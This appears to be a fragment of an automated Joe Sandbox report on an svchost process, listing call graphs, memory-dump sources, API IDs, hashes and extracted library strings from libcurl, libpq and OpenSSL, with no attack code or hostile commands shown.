Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 126146->126144 126148->126085 126149->126146 126157 7ffda3783290 33 API calls Concurrency::details::SchedulerProxy::DeleteThis 126150->126157 126152 7ffda3782946 126153 7ffda378294a 126152->126153 126158 7ffda3782d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 126152->126158 126153->125911 126155 7ffda3782966 126155->125911 126156->125911 126157->126152 126158->126155 126159 7ffd942e72e0 126160 7ffd942e7329 GetLastError 126159->126160 126162 7ffd942e72ff _Getctype 126159->126162 126161 7ffd942e733c 126160->126161 126164 7ffd942e735a SetLastError 126161->126164 126165 7ffd942e7357 126161->126165 126168 7ffd942e7110 GetLastError 126161->126168 126163 7ffd942e7324 126162->126163 126166 7ffd942e7110 _Getctype 11 API calls 126162->126166 126164->126163 126165->126164 126166->126163 126169 7ffd942e7136 126168->126169 126170 7ffd942e713c SetLastError 126169->126170 126186 7ffd942e6cc0 126169->126186 126171 7ffd942e71b5 126170->126171 126171->126165 126174 7ffd942e7175 FlsSetValue 126176 7ffd942e7198 126174->126176 126177 7ffd942e7181 FlsSetValue 126174->126177 126175 7ffd942e7165 FlsSetValue 126193 7ffd942e6d40 13 API calls 2 library calls 126175->126193 126195 7ffd942e6f28 13 API calls _Getctype 126176->126195 126194 7ffd942e6d40 13 API calls 2 library calls 126177->126194 126179 7ffd942e7173 126179->126170 126182 7ffd942e7196 SetLastError 126182->126171 126183 7ffd942e71a0 126196 7ffd942e6d40 13 API calls 2 library calls 126183->126196 126191 7ffd942e6cd1 _Getctype 126186->126191 126187 7ffd942e6d06 RtlAllocateHeap 126189 7ffd942e6d20 126187->126189 126187->126191 126188 7ffd942e6d22 126197 7ffd942d93a8 13 API calls _Getctype 126188->126197 126189->126174 126189->126175 126191->126187 126191->126188 126192 7ffd942e5790 std::_Facet_Register 2 API calls 126191->126192 126192->126191 126193->126179 126194->126182 126195->126183 126196->126182 126197->126189
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcfree
                          • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: R_get_error_errnofree$S_methodX_ctrlX_freeX_newX_set_cert_cbX_set_default_passwd_cbX_set_default_passwd_cb_userdataX_set_optionslibintl_dgettextmalloc
                          • String ID: %s/%s$0123456789.$certificate does not match private key file "%s": %s$certificate present, but not private key file "%s"$could not create SSL context: %s$could not establish SSL connection: %s$could not get home directory to locate root certificate fileEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$could not initialize SSL user "%s": %s$could not load SSL user "%s": %s$could not load private SSL key "%s" from user "%s": %s$could not load private key file "%s": %s$could not load system root certificate paths: %s$could not open certificate file "%s": %s$could not read certificate file "%s": %s$could not read private SSL key "%s" from user "%s": %s$could not read root certificate file "%s": %s$could not set SSL Server Name Indication (SNI): %s$could not set maximum SSL protocol version: %s$could not set minimum SSL protocol version: %s$could not stat private key file "%s": %m$invalid value "%s" for maximum SSL protocol version$invalid value "%s" for minimum SSL protocol version$out of memory$out of memory allocating error description$postgresql.crt$postgresql.key$private key file "%s" is not a regular file$root certificate file "%s" does not existEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$root.crl$root.crt$system

                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_newR_set_debugR_set_error
                          • String ID: SSL_CTX_new_ex$ssl\ssl_lib.c

                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$L_sk_freeL_sk_pop_free$X509_free$M_freeO_free_allX_free$O_popT_freeX509_
                          • String ID: ssl\ssl_lib.c

                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: Y_asn1_find_strY_asn1_get0_info$E_fetchH_fetchR_pop_to_markR_set_mark$D_get_sizeE_freeH_freeJ_nid2snR_fetch
                          • String ID: $ $ $ $DSA$ECDH$ECDSA$gost-mac$gost-mac-12$gost2001$gost2012_256$gost2012_512$kuznyechik-mac$magma-mac

                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: M_get_intO_zallocR_newR_set_debugR_set_error
                          • String ID: NULL$RC4$max_early_data$max_frag_len$ssl\record\methods\tls_common.c$stream_mac$tls_int_new_record_layer$tlstree$use_etm

                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: D_lock_freeO_free$D_lock_newO_free_ex_dataO_new_ex_dataO_zallocR_newR_set_debugR_set_error
                          • String ID: SSL_set_ct_validation_callback$ossl_ssl_connection_new_int$ssl\ssl_lib.c

                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad$DirectoryHandleModuleSystem$CleanupFrequencyPerformanceQueryStartupfreemallocwcspbrk
                          • String ID: AddDllDirectory$FreeAddrInfoExW$GetAddrInfoExCancel$GetAddrInfoExW$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32$ws2_32

                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: free$CriticalSection$CloseHandleclosesocket$AddrByteCharInfoMultiWide_errno_strdupmemset$CancelCreateDeleteEnterEventInitializeLeaveObjectSingleWaitcallocmallocsocketswprintf_s
                          • String ID:
                          • API String ID: 416132278-0
                          • Opcode ID: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                          • Instruction ID: c0eced328a4a409a8789950e4bdffcfe0ac41b069c319936504a66e477b96b05
                          • Opcode Fuzzy Hash: b754e2acbba8f62ce28666c0b1cd78244c23c721d766d0c8adfa948de88007ba
                          • Instruction Fuzzy Hash: 22C1AF3A70AB8A82E756DF21E86436973A0FF46F54F444635EA6E03B92DF3CE0548314

                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID:
                          • String ID: ($($NTLM picked AND auth done set, clear picked$NTLM-proxy picked AND auth done set, clear picked$No connections available in cache$No connections available.$No more connections allowed to host: %zu$Re-using existing connection with %s %s$anonymous$ftp@example.com$host$proxy
                          • API String ID: 0-3942307397
                          • Opcode ID: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
                          • Instruction ID: 7a9c9e3f20a27420523828eedfdedad418a2a04754a3aa8ba8995e96c5b17d0f
                          • Opcode Fuzzy Hash: 1733cf3c4f71a555df5f6a50032d9b8bb588882759e49a2dea7c43c5f06a7732
                          • Instruction Fuzzy Hash: C042852AB0A78A96EB569F25E5203BA63A4FB42F84F084035DE8D47793DF3CF4548354

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast_errnosetsockopt$CounterIoctlPerformanceQueryclosesocketgetsockopthtonsinet_ntop
                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %qd: errno %d$Failed to set SO_KEEPALIVE on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                          • API String ID: 2614696814-935189632
                          • Opcode ID: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                          • Instruction ID: 208123dd4b90ed6b19fe21104a3289dbb38e63bec07603a71b1cfbc3064bcde2
                          • Opcode Fuzzy Hash: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                          • Instruction Fuzzy Hash: 96D1CD3AB0D68A96EB1ACF65E4643AE67A0FB46F84F404531DA4D43B96DF3CE044C708
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$AttributesErrorFileLast
                          • String ID: could not get junction for "%s": %s
                          • API String ID: 3917093391-640641469
                          • Opcode ID: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                          • Instruction ID: 96769f31d509f1446a1f284ec10a26067842206f90e938f7a577d6b359f5b9f8
                          • Opcode Fuzzy Hash: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                          • Instruction Fuzzy Hash: 04619421B0E79296F7A09F20A86426977A2FB45774F404335DA6D23BE6CF3ED414C708
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA33813BB
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA33813D3
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA33813F4
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA338150F
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA3381527
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA3381863
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA338187B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_new$R_set_debug
                          • String ID: ossl_early_data_count_ok$ssl3_write_bytes$ssl\record\rec_layer_s3.c$tls_write_check_pending
                          • API String ID: 476316267-2399994965
                          • Opcode ID: f8178f680d83f3a347cd805ee141a041ec28e9a68a41335fa12e187e3285071d
                          • Instruction ID: 5d9302362da65ad9c0c7ed97468a46e3541651ed17a341aa3a4d584c50498497
                          • Opcode Fuzzy Hash: f8178f680d83f3a347cd805ee141a041ec28e9a68a41335fa12e187e3285071d
                          • Instruction Fuzzy Hash: 10E19E31F0EE8282EB50ABA5D4217B92292EF81B88F144531DE1D6B7D7DF3EE5858344
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: inet_pton$SimpleString::operator=inet_ntop
                          • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                          • API String ID: 1960554822-2421204314
                          • Opcode ID: fb8889e82ae435d31b9017080458bc7e7dfa480ed605606885101f527b68be12
                          • Instruction ID: 6892ac36cc5930fc7c15100d6a92365deb2dc23324799bb05ae185dc7dfa2e86
                          • Opcode Fuzzy Hash: fb8889e82ae435d31b9017080458bc7e7dfa480ed605606885101f527b68be12
                          • Instruction Fuzzy Hash: 5FE1AD6AF0AA9A85EB168F7195603BC27B2EB47F88F444235DE1D07786DF3CE0458308
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                          • String ID:
                          • API String ID: 3053784475-0
                          • Opcode ID: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                          • Instruction ID: 752ee9b64bc27ebe8bd23b623bd108d15d7b9ae58e28e3330731f19fd7591b2b
                          • Opcode Fuzzy Hash: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                          • Instruction Fuzzy Hash: 61819E27B19A998AFB21DF64D4283FC2361BF46B68F410730DE6D06BD6EF3891468344
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastO_test_flagsO_writeR_newR_set_debugR_vset_error
                          • String ID: ssl\record\methods\tls_common.c$tls_retry_write_records$tls_write_records
                          • API String ID: 1843479370-2458201149
                          • Opcode ID: 5a0e7b9a21a6a13af6988486327915390eef1c9b2d16b54942bd54142d920185
                          • Instruction ID: 8b4d29f3109ef8d37d1ce97b45eb11ddd77f47b7666984ff8eb01c6c30309a9d
                          • Opcode Fuzzy Hash: 5a0e7b9a21a6a13af6988486327915390eef1c9b2d16b54942bd54142d920185
                          • Instruction Fuzzy Hash: 5871A262B0EE5183E794AB66D5603B823A6FB84B44F140531CF1D63B96DF3BE4A1C308
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$M_freeM_move_peernameR_newR_set_debugR_set_errorX509_X509_freeX_free
                          • String ID: ossl_ssl_connection_reset$ssl\ssl_lib.c
                          • API String ID: 1979470287-3605862542
                          • Opcode ID: 64869083f6447652d00b06199bb98fb12f1af2d577d0d16ad5931df5c3789ef0
                          • Instruction ID: b93b2d087dd9259f338fc1fd85b9c37158102fe182a0ac0a8a13d4a0ba17699c
                          • Opcode Fuzzy Hash: 64869083f6447652d00b06199bb98fb12f1af2d577d0d16ad5931df5c3789ef0
                          • Instruction Fuzzy Hash: BB519F32B0EB8281E750FF26D4602AD73A5FF84B98F084136DA4D5B7AACF39D4418714
                          APIs
                          • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BB4
                          • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BBD
                          • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BC6
                          • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BDF
                          • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C05
                          • EVP_MD_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C11
                          • OPENSSL_cleanse.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C35
                          • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C60
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$X_free$L_cleanse
                          • String ID: ssl\record\methods\tls_common.c
                          • API String ID: 3857070794-847517130
                          • Opcode ID: 8d2159bac57eb334fd317ca3dc97f6b5d03ccc3f7ccdcc6aaa2a60c1a2b936cf
                          • Instruction ID: 9e6ed4307f79917a18f7224aef74031d0fde2306f53aedf73ae73dc0c5fd468a
                          • Opcode Fuzzy Hash: 8d2159bac57eb334fd317ca3dc97f6b5d03ccc3f7ccdcc6aaa2a60c1a2b936cf
                          • Instruction Fuzzy Hash: D1213232F1EE9186EA14FB21E8642E96366EF84B80F044431EB9E53797DE3EE551C704
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332F7F
